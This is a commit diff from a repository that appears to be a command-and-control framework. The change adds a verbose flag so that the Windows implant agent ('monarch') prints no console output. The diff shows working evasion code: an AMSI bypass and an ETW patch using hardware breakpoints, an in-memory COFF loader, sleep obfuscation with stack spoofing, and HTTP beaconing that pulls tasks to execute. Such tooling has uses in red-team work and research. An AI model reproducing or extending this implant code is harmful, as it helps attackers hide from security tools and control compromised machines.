admin/conquest
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Implemented setting for verbose mode that prints debug messages in the windows where the agent is executed. Setting "verbose" to false disables all console output of the agent program.

Browse Source
This commit is contained in:
Jakob Friedl
2025-10-20 22:08:06 +02:00
parent 382e31c439
commit 0bf717992e
24 changed files with 119 additions and 78 deletions
Download Patch File Download Diff File Expand all files Collapse all files

6
src/agent/core/clr.nim
View File

@@ -1,6 +1,6 @@
import winim/[lean, clr]
import os, strformat, strutils, sequtils
import ./hwbp
import ./[hwbp, io]
import ../../common/[types, utils]
#[
@@ -19,14 +19,14 @@ import ../../common/[types, utils]
proc amsiPatch(pThreadCtx: PCONTEXT) =
# Set the AMSI_RESULT parameter to 0 (AMSI_RESULT_CLEAN)
SETPARAM_6(pThreadCtx, cast[PULONG](0))
echo protect(" [+] AMSI_SCAN_RESULT set to AMSI_RESULT_CLEAN")
print protect(" [+] AMSI_SCAN_RESULT set to AMSI_RESULT_CLEAN")
CONTINUE_EXECUTION(pThreadCtx)
proc etwPatch(pThreadCtx: PCONTEXT) =
pThreadCtx.Rip = cast[PULONG_PTR](pThreadCtx.Rsp)[]
pThreadCtx.Rsp += sizeof(PVOID)
pThreadCtx.Rax = STATUS_SUCCESS
echo protect(" [+] Return value of NtTraceEvent set to STATUS_SUCCESS")
print protect(" [+] Return value of NtTraceEvent set to STATUS_SUCCESS")
CONTINUE_EXECUTION(pThreadCtx)
#[

26
src/agent/core/coff.nim
View File

@@ -1,6 +1,6 @@
import winim/lean
import os, strformat, strutils, ptr_math
import ./beacon
import ./[beacon, io]
import ../../common/[types, utils, serialize]
#[
@@ -88,7 +88,7 @@ proc objectVirtualSize(objCtx: POBJECT_CTX): ULONG =
# Check if symbol starts with `__ipm_` (imported functions)
if ($symbol).startsWith("__imp_"):
length += ULONG(sizeof(PVOID))
# echo $symbol
# print $symbol
# Handle next relocation item/symbol
objRel = cast[PIMAGE_RELOCATION](cast[int](objRel) + sizeof(IMAGE_RELOCATION))
@@ -156,7 +156,7 @@ proc objectResolveSymbol(symbol: var PSTR): PVOID =
if resolved == NULL:
raise newException(CatchableError, fmt"Function {$function} not found in {$library}.")
echo fmt" [>] {$symbol} @ 0x{resolved.repr}"
print fmt" [>] {$symbol} @ 0x{resolved.repr}"
RtlSecureZeroMemory(addr buffer[0], sizeof(buffer))
@@ -339,9 +339,9 @@ proc inlineExecute*(objectFile: seq[byte], args: seq[byte] = @[], entryFunction:
objCtx.symTbl = cast[PIMAGE_SYMBOL](cast[int](pObject) + cast[int](objCtx.union.header.PointerToSymbolTable))
objCtx.sections = cast[PIMAGE_SECTION_HEADER](cast[int](pObject) + sizeof(IMAGE_FILE_HEADER))
# echo objCtx.union.header.repr
# echo objCtx.symTbl.repr
# echo objCtx.sections.repr
# print objCtx.union.header.repr
# print objCtx.symTbl.repr
# print objCtx.sections.repr
# Verifying that the object file's architecture is x64
when defined(amd64):
@@ -354,7 +354,7 @@ proc inlineExecute*(objectFile: seq[byte], args: seq[byte] = @[], entryFunction:
# Calculate required virtual memory
virtSize = objectVirtualSize(addr objCtx)
echo fmt"[*] Virtual size of object file: {virtSize} bytes"
print fmt"[*] Virtual size of object file: {virtSize} bytes"
# Allocate memory
virtAddr = VirtualAlloc(NULL, virtSize, MEM_RESERVE or MEM_COMMIT, PAGE_READWRITE)
@@ -370,7 +370,7 @@ proc inlineExecute*(objectFile: seq[byte], args: seq[byte] = @[], entryFunction:
raise newException(CatchableError, $GetLastError())
defer: HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, objCtx.secMap)
echo fmt"[*] Virtual memory allocated for object file at 0x{virtAddr.repr} ({virtSize} bytes)"
print fmt"[*] Virtual memory allocated for object file at 0x{virtAddr.repr} ({virtSize} bytes)"
# Set the section base to the allocated memory
secBase = virtAddr
@@ -380,7 +380,7 @@ proc inlineExecute*(objectFile: seq[byte], args: seq[byte] = @[], entryFunction:
sections = cast[ptr UncheckedArray[IMAGE_SECTION_HEADER]](objCtx.sections)
secMap = cast[ptr UncheckedArray[SECTION_MAP]](objCtx.secMap)
echo "[*] Copying over sections."
print "[*] Copying over sections."
for i in 0 ..< int(objCtx.union.header.NumberOfSections):
secSize = sections[i].SizeOfRawData
secMap[i].size = secSize
@@ -388,7 +388,7 @@ proc inlineExecute*(objectFile: seq[byte], args: seq[byte] = @[], entryFunction:
# Copy over section data
copyMem(secBase, cast[PVOID](objCtx.union.base + cast[int](sections[i].PointerToRawData)), secSize)
echo fmt" [>] {$(addr sections[i].Name)} @ 0x{secBase.repr} ({secSize} bytes))"
print fmt" [>] {$(addr sections[i].Name)} @ 0x{secBase.repr} ({secSize} bytes))"
# Get the next page entry
secBase = cast[PVOID](PAGE_ALIGN(cast[uint](secBase) + uint(secSize)))
@@ -396,17 +396,17 @@ proc inlineExecute*(objectFile: seq[byte], args: seq[byte] = @[], entryFunction:
# The last page of the memory is the symbol/function map
objCtx.symMap = cast[ptr PVOID](secBase)
echo "[*] Processing sections and performing relocations."
print "[*] Processing sections and performing relocations."
if not objectProcessSection(addr objCtx):
RtlSecureZeroMemory(addr objCtx, sizeof(objCtx))
raise newException(CatchableError, "Failed to process sections.")
# Executing the object file
echo "[*] Executing."
print "[*] Executing."
if not objectExecute(addr objCtx, entryFunction, args):
RtlSecureZeroMemory(addr objCtx, sizeof(objCtx))
raise newException(CatchableError, fmt"Failed to execute function {$entryFunction}.")
echo "[+] Object file executed successfully."
print "[+] Object file executed successfully."
RtlSecureZeroMemory(addr objCtx, sizeof(objCtx))

5
src/agent/core/context.nim
View File

@@ -1,4 +1,5 @@
import parsetoml, base64, system
import ./io
import ../../common/[types, utils, crypto, serialize]
const CONFIGURATION {.strdefine.}: string = ""
@@ -38,7 +39,7 @@ proc deserializeConfiguration(config: string): AgentCtx =
wipeKey(agentKeyPair.privateKey)
echo protect("[+] Profile configuration deserialized.")
print protect("[+] Profile configuration deserialized.")
return ctx
proc init*(T: type AgentCtx): AgentCtx =
@@ -50,7 +51,7 @@ proc init*(T: type AgentCtx): AgentCtx =
return deserializeConfiguration(CONFIGURATION)
except CatchableError as err:
echo "[-] " & err.msg
print "[-] " & err.msg
return nil

6
src/agent/core/http.nim
View File

@@ -1,5 +1,5 @@
import httpclient, json, strformat, strutils, asyncdispatch, base64, tables, parsetoml, random
import ./io
import ../../common/[types, utils, profile]
proc httpGet*(ctx: AgentCtx, heartbeat: seq[byte]): string =
@@ -71,7 +71,7 @@ proc httpGet*(ctx: AgentCtx, heartbeat: seq[byte]): string =
except CatchableError as err:
# When the listener is not reachable, don't kill the application, but check in at the next time
echo "[-] " & err.msg
print protect("[-] "), err.msg
finally:
client.close()
@@ -103,7 +103,7 @@ proc httpPost*(ctx: AgentCtx, data: seq[byte]): bool {.discardable.} =
discard waitFor client.request(fmt"http://{host}/{endpoint}", requestMethod, body)
except CatchableError as err:
echo "[-] " & err.msg
print protect("[-] "), err.msg
return false
finally:

11
src/agent/core/hwbp.nim
View File

@@ -1,4 +1,5 @@
import winim/lean
import ./io
import ../../common/utils
# From: https://github.com/m4ul3r/malware/blob/main/nim/hardware_breakpoints/hardwarebreakpoints.nim
@@ -33,7 +34,7 @@ proc setHardwareBreakpoint*(pAddress: PVOID, fnHookFunc: PVOID, drx: DRX): bool
threadCtx.ContextFlags = CONTEXT_DEBUG_REGISTERS
if GetThreadContext(cast[HANDLE](-2), threadCtx.addr) == 0:
echo protect("[!] GetThreadContext Failed: "), GetLastError()
print protect("[!] GetThreadContext Failed: "), GetLastError()
return false
case drx:
@@ -59,7 +60,7 @@ proc setHardwareBreakpoint*(pAddress: PVOID, fnHookFunc: PVOID, drx: DRX): bool
threadCtx.Dr7 = setDr7Bits(threadCtx.Dr7, (cast[int](drx) * 2), 1, 1)
if SetThreadContext(cast[HANDLE](-2), threadCtx.addr) == 0:
echo protect("[!] SetThreadContext Failed: "), GetLastError()
print protect("[!] SetThreadContext Failed: "), GetLastError()
return false
return true
@@ -69,7 +70,7 @@ proc removeHardwareBreakpoint*(drx: DRX): bool =
threadCtx.ContextFlags = CONTEXT_DEBUG_REGISTERS
if GetThreadContext(cast[HANDLE](-2), threadCtx.addr) == 0:
echo protect("[!] GetThreadContext Failed: "), GetLastError()
print protect("[!] GetThreadContext Failed: "), GetLastError()
return false
# Remove the address of the hooked function from the thread context
@@ -87,7 +88,7 @@ proc removeHardwareBreakpoint*(drx: DRX): bool =
threadCtx.Dr7 = setDr7Bits(threadCtx.Dr7, (cast[int](drx) * 2), 1, 0)
if SetThreadContext(cast[HANDLE](-2), threadCtx.addr) == 0:
echo protect("[!] SetThreadContext Failed"), GetLastError()
print protect("[!] SetThreadContext Failed"), GetLastError()
return false
return true
@@ -196,7 +197,7 @@ proc initializeHardwareBPVariables*(): bool =
# Add 'VectorHandler' as the VEH
g_VectorHandler = AddVectoredExceptionHandler(1, cast[PVECTORED_EXCEPTION_HANDLER](vectorHandler))
if cast[int](g_VectorHandler) == 0:
echo protect("[!] AddVectoredExceptionHandler Failed")
print protect("[!] AddVectoredExceptionHandler Failed")
return false
if (cast[int](g_VectorHandler) and cast[int](g_CriticalSection.DebugInfo)) != 0:

17
src/agent/core/io.nim Normal file
View File

@@ -0,0 +1,17 @@
import macros
import ../../common/[types, utils]
const VERBOSE* {.booldefine.} = false
# Only print to console when VERBOSE mode is enabled
template print*(args: varargs[untyped]): untyped =
when defined(VERBOSE) and VERBOSE == true:
echo args
else:
discard
# Convert Windows API error to readable value
# https://learn.microsoft.com/de-de/windows/win32/api/winbase/nf-winbase-formatmessage
# Convert NTSTATUS to readable value
# https://ntdoc.m417z.com/rtlntstatustodoserror

28
src/agent/core/sleepmask.nim
View File

@@ -2,7 +2,7 @@ import winim/lean
import winim/inc/tlhelp32
import os, system, strformat
import ./cfg
import ./[cfg, io]
import ../../common/[types, utils, crypto]
# Different sleep obfuscation techniques, reimplemented in Nim (Ekko, Zilean, Foliage)
@@ -115,10 +115,10 @@ proc GetRandomThreadCtx(): CONTEXT =
if GetThreadContext(hThread, addr ctx) == 0:
continue
echo fmt"[*] Using thread {thd32Entry.th32ThreadID} for stack spoofing."
print fmt"[*] Using thread {thd32Entry.th32ThreadID} for stack spoofing."
return ctx
echo protect("[-] No suitable thread for stack duplication found.")
print protect("[-] No suitable thread for stack duplication found.")
return ctx
#[
@@ -280,17 +280,17 @@ proc sleepEkko(apis: Apis, key, img: USTRING, sleepDelay: int, spoofStack: var b
if status != STATUS_SUCCESS:
raise newException(CatchableError, "RtlCreateTimer/NtContinue " & $status.toHex())
echo protect("[*] Sleep obfuscation start.")
print protect("[*] Sleep obfuscation start.")
status = apis.NtSignalAndWaitForSingleObject(hEventStart, hEventEnd, FALSE, NULL)
if status != STATUS_SUCCESS:
raise newException(CatchableError, "NtSignalAndWaitForSingleObject " & $status.toHex())
echo protect("[*] Sleep obfuscation end.")
print protect("[*] Sleep obfuscation end.")
except CatchableError as err:
sleep(sleepDelay)
echo protect("[-] "), err.msg
print protect("[-] "), err.msg
#[
@@ -448,17 +448,17 @@ proc sleepZilean(apis: Apis, key, img: USTRING, sleepDelay: int, spoofStack: var
if status != STATUS_SUCCESS:
raise newException(CatchableError, "RtlRegisterWait/NtContinue " & $status.toHex())
echo protect("[*] Sleep obfuscation start.")
print protect("[*] Sleep obfuscation start.")
status = apis.NtSignalAndWaitForSingleObject(hEventStart, hEventEnd, FALSE, NULL)
if status != STATUS_SUCCESS:
raise newException(CatchableError, "NtSignalAndWaitForSingleObject " & $status.toHex())
echo protect("[*] Sleep obfuscation end.")
print protect("[*] Sleep obfuscation end.")
except CatchableError as err:
sleep(sleepDelay)
echo protect("[-] "), err.msg
print protect("[-] "), err.msg
#[
@@ -484,7 +484,7 @@ proc sleepFoliage(apis: Apis, key, img: USTRING, sleepDelay: int) =
status = apis.NtCreateThreadEx(addr hThread, THREAD_ALL_ACCESS, NULL, GetCurrentProcess(), NULL, NULL, TRUE, 0, 0x1000 * 20, 0x1000 * 20, NULL)
if status != STATUS_SUCCESS:
raise newException(CatchableError, "NtCreateThreadEx " & $status.toHex())
echo fmt"[*] [{hThread.repr}] Thread created "
print fmt"[*] [{hThread.repr}] Thread created "
defer: CloseHandle(hThread)
ctxInit.ContextFlags = CONTEXT_FULL
@@ -559,17 +559,17 @@ proc sleepFoliage(apis: Apis, key, img: USTRING, sleepDelay: int) =
if status != STATUS_SUCCESS:
raise newException(CatchableError, "NtAlertResumeThread " & $status.toHex())
echo protect("[*] Sleep obfuscation start.")
print protect("[*] Sleep obfuscation start.")
status = apis.NtSignalAndWaitForSingleObject(hEventSync, hThread, TRUE, NULL)
if status != STATUS_SUCCESS:
raise newException(CatchableError, "NtSignalAndWaitForSingleObject " & $status.toHex())
echo protect("[*] Sleep obfuscation end.")
print protect("[*] Sleep obfuscation end.")
except CatchableError as err:
sleep(sleepDelay)
echo protect("[-] "), err.msg
print protect("[-] "), err.msg
# Sleep obfuscation implemented in various techniques
proc sleepObfuscate*(sleepDelay: int, technique: SleepObfuscationTechnique = NONE, spoofStack: var bool = true) =
@@ -580,7 +580,7 @@ proc sleepObfuscate*(sleepDelay: int, technique: SleepObfuscationTechnique = NON
# Initialize required API functions
let apis = initApis()
echo fmt"[*] Sleepmask settings: Technique: {$technique}, Delay: {$sleepDelay}ms, Stack spoofing: {$spoofStack}"
print fmt"[*] Sleepmask settings: Technique: {$technique}, Delay: {$sleepDelay}ms, Stack spoofing: {$spoofStack}"
var img: USTRING = USTRING(Length: 0)
var key: USTRING = USTRING(Length: 0)

14
src/agent/main.nim
View File

@@ -1,6 +1,6 @@
import strformat, os, times, system, base64, random
import core/[http, context, sleepmask]
import core/[http, context, sleepmask, io]
import protocol/[task, result, heartbeat, registration]
import ../common/[types, utils, crypto]
@@ -17,9 +17,9 @@ proc main() =
let registrationBytes = ctx.serializeRegistrationData(registration)
if not ctx.httpPost(registrationBytes):
echo "[-] Agent registration failed."
print("[-] Agent registration failed.")
quit(0)
echo fmt"[+] [{ctx.agentId}] Agent registered."
print fmt"[+] [{ctx.agentId}] Agent registered."
#[
Agent routine:
@@ -34,7 +34,7 @@ proc main() =
sleepObfuscate(ctx.sleep * 1000, ctx.sleepTechnique, ctx.spoofStack)
let date: string = now().format("dd-MM-yyyy HH:mm:ss")
echo "\n", fmt"[*] [{date}] Checking in."
print "\n", fmt"[*] [{date}] Checking in."
try:
# Retrieve task queue for the current agent by sending a check-in/heartbeat request
@@ -45,13 +45,13 @@ proc main() =
packet: string = ctx.httpGet(heartbeatBytes)
if packet.len <= 0:
echo "[*] No tasks to execute."
print("[*] No tasks to execute.")
continue
let tasks: seq[Task] = ctx.deserializePacket(packet)
if tasks.len <= 0:
echo "[*] No tasks to execute."
print("[*] No tasks to execute.")
continue
# Execute all retrieved tasks and return their output to the server
@@ -62,7 +62,7 @@ proc main() =
ctx.httpPost(resultBytes)
except CatchableError as err:
echo "[-] ", err.msg
print("[-] ", err.msg)
when isMainModule:
main()

1
src/agent/nim.cfg
View File

@@ -5,4 +5,5 @@
--passL:"-s" # Strip symbols, such as sensitive function names
-d:CONFIGURATION="PLACEHOLDERAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPLACEHOLDER"
-d:MODULES="511"
-d:VERBOSE="false"
-o:"/mnt/c/Users/jakob/Documents/Projects/conquest/bin/monarch.x64.exe"

3
src/agent/protocol/task.nim
View File

@@ -1,6 +1,7 @@
import strutils, tables, json, strformat, zippy
import ./result
import ../core/io
import ../../modules/manager
import ../../common/[types, serialize, sequence, crypto, utils]
@@ -61,7 +62,7 @@ proc deserializePacket*(ctx: AgentCtx, packet: string): seq[Task] =
var unpacker = Unpacker.init(packet)
var taskCount = unpacker.getUint8()
echo fmt"[*] Response contained {taskCount} tasks."
print fmt"[*] Response contained {taskCount} tasks."
if taskCount <= 0:
return @[]